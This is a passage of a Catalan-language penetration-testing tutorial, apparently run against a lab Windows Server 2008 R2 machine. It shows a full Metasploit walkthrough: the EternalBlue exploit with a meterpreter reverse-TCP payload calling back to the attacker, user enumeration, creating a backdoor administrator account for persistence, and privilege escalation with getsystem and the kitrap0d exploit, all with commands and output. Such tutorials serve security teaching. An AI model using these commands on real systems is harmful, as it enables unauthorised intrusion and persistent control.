## 3. Obtenir el control del dispositiu:


### 3.1. Control a partir de l'exploit ms17_010_eternalblue

Primer de tot mirarem com obtenir el control partint del punt on ens vam quedar a l'anterior part, [2.Accés als dispositius descoberts](./2_acces_dispositius_descoberts.md). Seguint des d'aquell punt, ara mateix el que tenim és una sessió oberta a la màquina objectiu (windows en aquest cas). Primer de tot el que farem és mirar quin usuari som per tal de veure quins són els nostres privilegis, és a dir, si som un usuari normal, tenim permisos d'administrador o algun altre permís en especial:

```
C:\Windows\system32>whoami
whoami
nt authority\system
```

Com podem veure, en aquest cas som l'usuari ```nt authority\system```. Aquest és un usuari que té permisos d'administrador i sobre tot el sistema, de manera que en aquest cas no necessitarem escalar privilegis per tal de poder obtenir-ne el control.

Un cop ja sabem qui som i que podem fer podríem mirar quins altres usuaris hi ha a la màquina que estem atacant. D'aquesta manera obtindrem informació de la màquina i a més, en el cas de voler executar un atac de diccionari a algun dels usuaris de la màquina, podem reduir considerablement el temps d'aquest atac si ja sabem quin usuari en concret volem atacar:

```
C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    sshd                     
sshd_server              vagrant                  
```

Com podem veure, hi ha 5 usuaris en aquesta màquina. Pel nom d'algun d'aquests usuaris, podríem sospitar que no tots podrien ser usuaris actius, i per tant alguns només s'utilitzarien per executar processos en el seu nom. Podem comprovar quins d'aquests usuaris són actius per saber amb quins podríem arribar a iniciar sessió:

```
C:\Windows\system32>net user vagrant
net user vagrant
User name                    vagrant
Full Name                    vagrant
Comment                      Vagrant User
User's comment               
Country code                 001 (United States)
Account active               Yes
Account expires              Never

Password last set            5/4/2020 6:09:25 AM
Password expires             Never
Password changeable          5/4/2020 6:09:25 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/4/2020 7:45:42 AM

Logon hours allowed          All

Local Group Memberships      *Users                
Global Group memberships     *None                 
The command completed successfully.
```

Ara que sabem els noms dels usuaris, a part de veure si són comptes actius o no, podem veure la seva informació (nom complet, privilegis o permisos, etc.). En aquest cas només els usuaris "Administrator" i "Vagrant" són comptes actius.

 Donada aquesta situació, una manera d'assegurar-nos l'accés a aquesta màquina podria ser creant un usuari propi, o canviant la contrasenya d'algun dels usuaris existents, ja que si s'actualitzés la màquina podríem perdre aquesta vulnerabilitat i per tant no podríem tornar a utilitzar aquest accés. Totes dues opcions són bastant ràpides de detectar. Si volguéssim que no se'ns detectés tan fàcilment, podríem intentar aconseguir la contrasenya d'algun usuari administrador mitjançant un atac de diccionari. En aquest cas el que farem serà crear un usuari propi, ja que no ens preocupa que es detecti aquest usuari creat:

 ```
C:\Windows\system32>net user /add test Abc12345
net user /add test Abc12345
The command completed successfully.
```

Un cop creem l'usuari, ens assegurem que té permisos d'administrador:

```
C:\Windows\system32>net localgroup administrators test /add                  
net localgroup administrators test /add
The command completed successfully.
```

Un cop creat l'usuari i assignats els permisos d'administrador, comprovem que podem obrir una sessió remota amb aquest usuari creat, per exemple per ssh:

```
kali@kali:~$ ssh test@192.168.0.21
test@192.168.0.21's password: 
Last login: Mon May  4 08:25:11 2020 from 192.168.0.19
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\OpenSSH\home\test>whoami
vagrant-2008r2\test
```


### 3.2. Control a partir d'un compte d'usuari sense permisos d'administrador (escalar privilegis amb "getsystem")


En el cas que amb la comanda anterior no puguem accedir directament a un usuari amb privilegis, haurem de buscar una manera d'obtenir aquests privilegis.

Primer de tot, utilitzarem el mateix mòdul que a l'anterior punt (ms17_010_eternalblue) per aprofitar la vulnerabilitat, però canviant el payload a utilitzar. El payload és la càrrega o programa que executem a la vulnerabilitat que estem aprofitant, una vegada hem accedit a ella. Podem veure els payloads que tenim amb la comanda "show payloads":

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   generic/custom                                               normal  No     Custom Payload
   1   generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   windows/x64/exec                                             normal  No     Windows x64 Execute Command
   4   windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   5   windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   6   windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   20  windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
   21  windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   22  windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   23  windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   24  windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   25  windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   26  windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   27  windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   28  windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   29  windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   30  windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   31  windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   32  windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   33  windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   34  windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   35  windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   36  windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   37  windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   38  windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   39  windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   40  windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   41  windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   42  windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   43  windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   44  windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   45  windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   46  windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
```

Aquests són tots els payloads que podem utilitzar ara mateix. En aquest cas agafarem el payload "windows/x64/meterpreter/reverse_tcp" amb la següent comanda:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
```

Un cop seleccionat el payload, veurem que amb la comanda "show options", no només podrem veure les opcions del mòdul, sinó que també les del payload:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.0.21     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
```

Per aquest payload només haurem de configurar la variable "LHOST", la qual serà la nostra pròpia ip (la del dispositiu atacant). En aquest cas ho hem de fer així, ja que el payload que hem carregat és el "reverse_tcp", de manera que com indica el nom, la connexió es realitza a la inversa. És a dir, la connexió es realitza de la màquina atacada (192.168.0.21) a la màquina atacant o pròpia (192.168.0.19). En aquest cas triem aquest payload, ja que generalment és més probable que els firewalls tinguin més connexions entrants bloquejades que no pas de sortida, ja que aquestes regles acostumen a ser més permissives.

Configurem la variable LHOST amb la ip de la màquina atacant:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.19
LHOST => 192.168.0.19
```

Un cop tenim tant el mòdul com el payload configurat, l'executem:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.19:4444 
[*] 192.168.0.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.21:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.21:445 - Connecting to target for exploitation.
[+] 192.168.0.21:445 - Connection established for exploitation.
[+] 192.168.0.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.21:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.0.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.0.21:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
[*] 192.168.0.21:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.0.21:445 - 0x00000030  6b 20 31                                         k 1             
[+] 192.168.0.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.21:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.0.21:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.21:445 - Starting non-paged pool grooming
[+] 192.168.0.21:445 - Sending SMBv2 buffers
[+] 192.168.0.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.21:445 - Sending final SMBv2 buffers.
[*] 192.168.0.21:445 - Sending last fragment of exploit packet!
[*] 192.168.0.21:445 - Receiving response from exploit packet
[+] 192.168.0.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.21:445 - Sending egg to corrupted connection.
[*] 192.168.0.21:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.0.21
[*] Meterpreter session 5 opened (192.168.0.19:4444 -> 192.168.0.21:49159) at 2020-05-05 11:17:34 -0400
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

```

Veurem que la consola ha canviat de nou en finalitzar l'exploit, però en aquest cas no tindrem la consola de Windows sinó que tenim una consola de "meterpreter". Meterpreter és el payload que acabem d'executar, però a més té una consola que ens permet fer diverses comandes per tal d'obtenir informació o poder manipular el sistema. Un cop ja tenim una sessió oberta a la màquina objectiu amb una consola de meterpreter, podem utilitzar la següent ordre per escalar privilegis:

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
```

Un cop finalitza aquesta comanda, podem comprovar que som l'usuari ```NT AUTHORITY\SYSTEM```, el qual té privilegis i permisos d'administrador:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### 3.3. Control a partir d'un compte d'usuari sense permisos d'administrador (escalar privilegis amb un exploit)


Pot donar-se el cas que el mètode anterior no funcionés, i el sistema no ens permeti obtenir privilegis. Si arribem en aquest punt, podem utilitzar un exploit per tal d'obtenir els privilegis. Seguint des de la mateixa consola de meterpreter, el primer que farem és deixar aquesta sessió en segon pla amb la comanda "background":

```
meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
```

Com podem veure hem tornat a la consola de metasploit. Aquesta ordre ens ha deixat la sessió oberta a la màquina objectiu, en segon pla. De manera que podem utilitzar la mateixa sessió que ja tenim creada per enviar altres exploits a través d'ella. El número que ens ha mostrat l'ordre a la sortida és el número de sessió, però en el cas que tinguem més sessions o que no recordem el número, podem veure les sessions que tenim obertes amb l'ordre "sessions":

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  5         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ VAGRANT-2008R2  192.168.0.19:4444 -> 192.168.0.21:49159 (192.168.0.21)
```

Ara que ja tenim la sessió en segon pla, carregarem el mòdul que utilitzarem per guanyar privilegis (ms10_015_kitrap0d):

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/ms10_015_kitrap0d 
msf5 exploit(windows/local/ms10_015_kitrap0d) > 
```

Si mirem les opcions del mòdul, veurem que només requereix un número de sessió per funcionar, ja que aquest exploit treballa a través de sessions que ja estan creades:

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.19     yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)a
```

Establim la sessió que li pertany a la variable "SESSIONS":

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 5
SESSION => 5
```

Un cop ja hem configurat això, hem de carregar i configurar el payload "reverse_tcp" (No cal fer-ho de nou si ja s'ha fet abans):

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 192.168.0.19
lhost => 192.168.0.19
```

Un cop configurat, ja podem executar l'exploit:

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.0.19:4443 
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
```

En aquest cas, veiem que l'exploit ha acabat però ens ha retornat un error, ja que la sessió que li hem indicat ja pertanyia a un usuari amb privilegis, i per tant no podia elevar-los més. En el cas que fem aquesta prova amb un usuari que no tingui privilegis, la sortida hauria de ser semblant a la següent:

```
msf exploit(windows/local/ms10_015_kitrap0d) > run

[*]  Started reverse handler on 192.168.0.19:4443 
[*]  Launching notepad to host the exploit...
[+]  Process 4048 launched.
[*]  Reflectively injecting the exploit DLL into 4048...
[*]  Injecting exploit into 4048 ...
[*]  Exploit injected. Injecting payload into 4048...
[*]  Payload injected. Executing exploit...
[+]  Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*]  Sending stage (769024 bytes) to 192.168.0.21
[*]  Meterpreter session 2 opened (192.168.0.19:4443 -> 192.168.0.21:49204) at 2020-05-05 17:55:38 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Com podem veure, l'exploit finalment ens ha obert una altra sessió amb l'usuari ```NT AUTHORITY\SYSTEM```.

